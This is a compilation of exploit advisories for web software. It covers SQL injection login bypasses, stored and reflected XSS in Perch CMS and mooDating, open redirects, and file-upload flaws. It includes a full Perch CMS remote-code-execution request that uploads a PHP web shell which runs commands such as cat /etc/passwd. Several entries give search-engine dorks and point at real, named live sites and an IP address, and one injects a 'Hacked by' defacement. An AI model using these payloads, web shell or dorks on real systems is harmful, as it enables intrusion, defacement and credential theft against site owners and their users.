<pre><code>====================================================================================================================================<br />| # Title : BRSS CMS 2.1 Auth BY Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://202.29.211.9/brss/index.php | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://202.29.211.9/brss/index.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Events Manager plugin 5.61 Blind SQL Injection |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://wordpress.com/plugins |<br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : /?event_id=1<br /><br />[+] http://127.0.0.1/wp/?event_id=1 inject here<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>Exploit Title: Perch v3.2 - Stored XSS<br />Application: Perch Cms<br />Version: v3.2<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://grabaperch.com/<br />Software Link: https://grabaperch.com/download<br />Date of found: 21.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account<br />2. go to http://localhost/perch_v3.2/perch/core/settings/<br />3. upload svg file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)<br /><br /></code></pre>
<pre><code>Exploit Title: Perch v3.2 - Remote Code Execution (RCE)<br />Application: Perch Cms<br />Version: v3.2<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://grabaperch.com/<br />Software Link: https://grabaperch.com/download<br />Date of found: 21.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account as admin<br />2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)<br />3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)<br />4. upload poc.phar file<br /><br />poc.phar file contents :<br /><?php $a=$_GET['code']; echo system($a);?><br /><br />5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd<br /><br /><br />poc request: <br /><br />POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1<br />Host: localhost<br />Content-Length: 1071<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9<br />Connection: close<br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="resourceTitle"<br /><br 
/>test<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image"; filename="poc.phar"<br />Content-Type: application/octet-stream<br /><br /><?php $a=$_GET['code']; echo system($a);?><br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image_field"<br /><br />1<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image_assetID"<br /><br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="resourceBucket"<br /><br />admin<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="tags"<br /><br />test<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="btnsubmit"<br /><br />Submit<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="formaction"<br /><br />edit<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="token"<br /><br />5494af3e8dbe5ac399ca7f12219cfe82<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z--<br /><br /></code></pre>
<pre><code># Exploit Title: mooDating 1.2 - Reflected XSS<br /># Exploit Author: CraCkEr aka (skalvin)<br /># Date: 22/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moodatingscript.com/<br /># Software Link: https://demo.moodatingscript.com/home<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846<br /> CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /matchmakings/question<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=<br />https://website/matchmakings/question[XSS]?number=<br /><br /><br />Path: /friends<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model<br />https://website/friends[XSS]/ajax_invite?mode=model<br /><br /><br />Path: /friends/ajax_invite<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model<br />https://website/friends/ajax_invite[XSS]?mode=model<br /><br />Path: /pages<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l<br 
/>https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l<br /><br />Path: /users<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity<br />https://website/user[XSS]/view/108?tab=activity<br /><br />Path: /users/view<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity<br />https://website/users/view[XSS]/108?tab=activity<br /><br /><br />Path: /find-a-match<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0<br />https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0<br /><br /><br />[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSctweb creative v 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : http://www.contedia.com/ | <br />| # Dork : "ct web design by brown bear creative" inurl:.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : /department.php?id=39'<script>alert(/indoushka/);</script><br /><br />[+] http://www.canterburyct.org/department.php?id=39%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Ultimate Solutions DreamSus v1.4 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://dreamsus.com | <br />| # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : /gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>&tpages=4<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&tpages=4<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Page Builder KingComposer 2.9.6 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://kingcomposer.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Image Optimization 3.8.2 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://wordpress.org/plugins/optimole-wp/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : /w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg<br /><br />[+] https://mlsxkssu4flj.i.optimolecom/nyJIGCw._y-W~3254a/w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://dreamsus.com | <br />| # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>